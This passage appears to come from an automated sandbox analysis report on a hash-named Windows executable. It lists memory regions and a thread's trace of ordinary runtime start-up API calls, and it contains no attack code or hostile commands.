	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 5609
	        start_va = 0x620000
	          end_va = 0x65ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000620000"
	        filename = ""

Region:
	              id = 5610
	        start_va = 0x2a00000
	          end_va = 0x2afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002a00000"
	        filename = ""

Region:
	              id = 5676
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 5677
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 5767
	        start_va = 0x5e0000
	          end_va = 0x61ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005e0000"
	        filename = ""

Region:
	              id = 5768
	        start_va = 0x2900000
	          end_va = 0x29fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 5815
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 5816
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 5874
	        start_va = 0x620000
	          end_va = 0x65ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000620000"
	        filename = ""

Region:
	              id = 5875
	        start_va = 0x2a00000
	          end_va = 0x2afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002a00000"
	        filename = ""

Region:
	              id = 5975
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 5976
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")


Thread:
	id = 1
	os_tid = 0x1180

	[0146.727] GetStartupInfoA (in: lpStartupInfo=0x18fd4c | out: lpStartupInfo=0x18fd4c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) 
	[0146.727] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0xf60000
	[0146.996] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0146.997] GetProcAddress (hModule=0x76d90000, lpProcName="FlsAlloc") returned 0x76daa980
	[0146.997] GetProcAddress (hModule=0x76d90000, lpProcName="FlsGetValue") returned 0x76da7570
	[0146.997] GetProcAddress (hModule=0x76d90000, lpProcName="FlsSetValue") returned 0x76da9e30
	[0146.997] GetProcAddress (hModule=0x76d90000, lpProcName="FlsFree") returned 0x76db4ff0
	[0146.997] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0146.998] GetProcAddress (hModule=0x76d90000, lpProcName="EncodePointer") returned 0x7709f730
	[0147.000] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0147.000] GetProcAddress (hModule=0x76d90000, lpProcName="EncodePointer") returned 0x7709f730
	[0147.000] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0147.001] GetProcAddress (hModule=0x76d90000, lpProcName="EncodePointer") returned 0x7709f730
	[0147.001] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0147.001] GetProcAddress (hModule=0x76d90000, lpProcName="EncodePointer") returned 0x7709f730
	[0147.002] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0147.002] GetProcAddress (hModule=0x76d90000, lpProcName="EncodePointer") returned 0x7709f730
	[0147.002] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0147.002] GetProcAddress (hModule=0x76d90000, lpProcName="EncodePointer") returned 0x7709f730
	[0147.003] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0147.003] GetProcAddress (hModule=0x76d90000, lpProcName="EncodePointer") returned 0x7709f730
	[0147.004] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0147.004] GetProcAddress (hModule=0x76d90000, lpProcName="DecodePointer") returned 0x7709d830
	[0147.005] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x214) returned 0xf605a8
	[0147.005] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0147.005] GetProcAddress (hModule=0x76d90000, lpProcName="DecodePointer") returned 0x7709d830
	[0147.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d90000
	[0147.006] GetProcAddress (hModule=0x76d90000, lpProcName="EncodePointer") returned 0x7709f730
	[0147.006] GetProcAddress (hModule=0x76d90000, lpProcName="DecodePointer") returned 0x7709d830
	[0147.007] GetCurrentThreadId () returned 0x1180
	[0147.007] GetStartupInfoA (in: lpStartupInfo=0x18fcd0 | out: lpStartupInfo=0x18fcd0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) 
	[0147.007] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x800) returned 0xf607c8
	[0147.007] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0147.007] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0147.007] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0147.007] SetHandleCount (uNumber=0x20) returned 0x20
	[0147.007] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe\" "
	[0147.007] GetEnvironmentStringsW () returned 0xfa3eb8*
	[0147.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1351, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1351
	[0147.008] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x0, Size=0x547) returned 0xf60fd0
	[0147.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1351, lpMultiByteStr=0xf60fd0, cbMultiByte=1351, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1351
	[0147.008] FreeEnvironmentStringsW (penv=0xfa3eb8) returned 1
	[0147.008] GetLastError () returned 0x0
	[0147.008] SetLastError (dwErrCode=0x0) 
	[0147.009] GetLastError () returned 0x0
	[0147.009] SetLastError (dwErrCode=0x0) 
	[0147.009] GetLastError () returned 0x0
	[0147.009] SetLastError (dwErrCode=0x0) 
	[0147.009] GetACP () returned 0x4e4
	[0147.009] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x0, Size=0x220) returned 0xf61520
	[0147.009] GetLastError () returned 0x0
	[0147.010] SetLastError (dwErrCode=0x0) 
	[0147.010] IsValidCodePage (CodePage=0x4e4) returned 1
	[0147.010] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fcb0 | out: lpCPInfo=0x18fcb0) returned 1
	[0147.010] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f77c | out: lpCPInfo=0x18f77c) returned 1
	[0147.010] GetLastError () returned 0x0
	[0147.010] SetLastError (dwErrCode=0x0) 
	[0147.010] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f70c | out: lpCharType=0x18f70c) returned 1
	[0147.010] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fb90, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0147.010] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fb90, cbMultiByte=256, lpWideCharStr=0x18f4f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿỾ懼âĀ") returned 256
	[0147.010] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿỾ懼âĀ", cchSrc=256, lpCharType=0x18f790 | out: lpCharType=0x18f790) returned 1
	[0147.011] GetLastError () returned 0x0
	[0147.011] SetLastError (dwErrCode=0x0) 
	[0147.011] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1
	[0147.011] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fb90, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0147.011] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fb90, cbMultiByte=256, lpWideCharStr=0x18f4c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ幀âĀ") returned 256
	[0147.011] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ幀âĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
	[0147.011] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ幀âĀ", cchSrc=256, lpDestStr=0x18f2b8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0147.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fa90, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ±\x11\x99ÇÈü\x18", lpUsedDefaultChar=0x0) returned 256
	[0147.011] GetLastError () returned 0x0
	[0147.012] SetLastError (dwErrCode=0x0) 
	[0147.012] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fb90, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0147.012] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fb90, cbMultiByte=256, lpWideCharStr=0x18f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ幀âĀ") returned 256
	[0147.012] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ幀âĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
	[0147.012] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ幀âĀ", cchSrc=256, lpDestStr=0x18f2d8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256
	[0147.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18f990, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ±\x11\x99ÇÈü\x18", lpUsedDefaultChar=0x0) returned 256
	[0147.013] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xe2f310, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe")) returned 0x62
	[0147.013] GetLastError () returned 0x0
	[0147.013] SetLastError (dwErrCode=0x0) 
	[0147.013] GetLastError () returned 0x0
	[0147.013] SetLastError (dwErrCode=0x0) 
	[0147.013] GetLastError () returned 0x0
	[0147.056] SetLastError (dwErrCode=0x0) 
	[0147.057] GetLastError () returned 0x0
	[0147.057] SetLastError (dwErrCode=0x0) 
	[0147.057] GetLastError () returned 0x0
	[0147.057] SetLastError (dwErrCode=0x0) 
	[0147.057] GetLastError () returned 0x0
	[0147.057] SetLastError (dwErrCode=0x0) 
	[0147.057] GetLastError () returned 0x0
	[0147.058] SetLastError (dwErrCode=0x0) 
	[0147.058] GetLastError () returned 0x0
	[0147.058] SetLastError (dwErrCode=0x0) 
	[0147.058] GetLastError () returned 0x0
	[0147.058] SetLastError (dwErrCode=0x0) 
	[0147.058] GetLastError () returned 0x0
	[0147.059] SetLastError (dwErrCode=0x0) 
	[0147.059] GetLastError () returned 0x0
	[0147.059] SetLastError (dwErrCode=0x0) 
	[0147.059] GetLastError () returned 0x0
	[0147.059] SetLastError (dwErrCode=0x0) 
	[0147.059] GetLastError () returned 0x0
	[0147.059] SetLastError (dwErrCode=0x0) 
	[0147.059] GetLastError () returned 0x0
	[0147.060] SetLastError (dwErrCode=0x0) 
	[0147.060] GetLastError () returned 0x0
	[0147.060] SetLastError (dwErrCode=0x0) 
	[0147.060] GetLastError () returned 0x0
	[0147.060] SetLastError (dwErrCode=0x0) 
	[0147.065] GetLastError () returned 0x0
	[0147.065] SetLastError (dwErrCode=0x0) 
	[0147.065] GetLastError () returned 0x0
	[0147.065] SetLastError (dwErrCode=0x0) 
	[0147.065] GetLastError () returned 0x0
	[0147.065] SetLastError (dwErrCode=0x0) 
	[0147.065] GetLastError () returned 0x0
	[0147.066] SetLastError (dwErrCode=0x0) 
	[0147.066] GetLastError () returned 0x0
	[0147.066] SetLastError (dwErrCode=0x0) 
	[0147.066] GetLastError () returned 0x0
	[0147.066] SetLastError (dwErrCode=0x0) 
	[0147.066] GetLastError () returned 0x0
	[0147.067] SetLastError (dwErrCode=0x0) 
	[0147.067] GetLastError () returned 0x0
	[0147.067] SetLastError (dwErrCode=0x0) 
	[0147.067] GetLastError () returned 0x0
	[0147.067] SetLastError (dwErrCode=0x0) 
	[0147.067] GetLastError () returned 0x0
	[0147.067] SetLastError (dwErrCode=0x0) 
	[0147.067] GetLastError () returned 0x0
	[0147.068] SetLastError (dwErrCode=0x0) 
	[0147.068] GetLastError () returned 0x0
	[0147.068] SetLastError (dwErrCode=0x0) 
	[0147.068] GetLastError () returned 0x0
	[0147.068] SetLastError (dwErrCode=0x0) 
	[0147.068] GetLastError () returned 0x0
